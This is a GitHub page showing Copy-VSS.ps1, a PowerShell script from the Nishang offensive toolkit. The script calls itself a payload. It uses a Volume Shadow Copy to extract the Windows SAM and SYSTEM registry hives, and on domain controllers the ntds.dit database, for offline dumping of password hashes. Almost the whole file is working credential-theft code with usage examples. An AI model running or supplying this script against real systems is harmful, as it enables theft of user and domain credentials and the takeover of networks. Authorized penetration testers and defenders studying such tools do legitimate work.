-
Notifications
You must be signed in to change notification settings - Fork 2.4k
/
Copy-VSS.ps1
84 lines (69 loc) · 2.38 KB
/
Copy-VSS.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
function Copy-VSS
{
<#
.SYNOPSIS
Nishang Payload which copies the SAM file (and ntds.dit and SYSTEM hive if run on a Domain Controller).
.DESCRIPTION
This payload uses the VSS service (starts it if not running), creates a shadow of C:
and copies the SAM file which could be used to dump password hashes from it. If the script is run on a Domain Controller, ntds.dit and SYSTEM hive are also copied.
The script must be run from an elevated shell.
The default path used for SAM is C:\Windows\System32\config\SAM, for SYSTEM hive it is C:\Windows\System32\config\SYSTEM and for
NTDS.dit it is C:\Windows\system32\ntds.dit. Sometimes the ntds.dit is present in other locations like D:\NTDS or C:\Windows\NTDS and so on.
Use $ntdsSource variable to provide the directory.
.PARAMETER PATH
The path where the files would be saved. It must already exist.
.EXAMPLE
PS > Copy-VSS
Saves the files in current run location of the payload.
.Example
PS > Copy-VSS -DestinationDir C:\temp
Saves the files in C:\temp.
.Example
PS > Copy-VSS -DestinationDir C:\temp -ntdsSource D:\ntds\ntds.dit
.LINK
http://www.canhazcode.com/index.php?a=4
https://github.com/samratashok/nishang
.NOTES
Code by @al14s
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[String]
$DestinationDir,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$ntdsSource
)
$service = (Get-Service -name VSS)
if($service.Status -ne "Running")
{
$notrunning=1
$service.Start()
}
$id = (Get-WmiObject -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume = (Get-WmiObject win32_shadowcopy -filter "ID='$id'")
$SAMpath = "$pwd\SAM"
$SYSTEMpath = "$pwd\SYSTEM"
$ntdspath = "$pwd\ntds"
if ($DestinationDir)
{
$SAMpath = "$DestinationDir\SAM"
$SYSTEMpath = "$DestinationDir\SYSTEM"
$ntdspath = "$DestinationDir\ntds"
}
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $SAMpath
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SYSTEM" $SYSTEMpath
if($ntdsSource)
{
cmd /c copy "$($volume.DeviceObject)\$ntdsSource\ntds.dit" $ntdspath
}
else
{
cmd /c copy "$($volume.DeviceObject)\windows\system32\ntds.dit" $ntdspath
}
$volume.Delete()
if($notrunning -eq 1)
{
$service.Stop()
}
}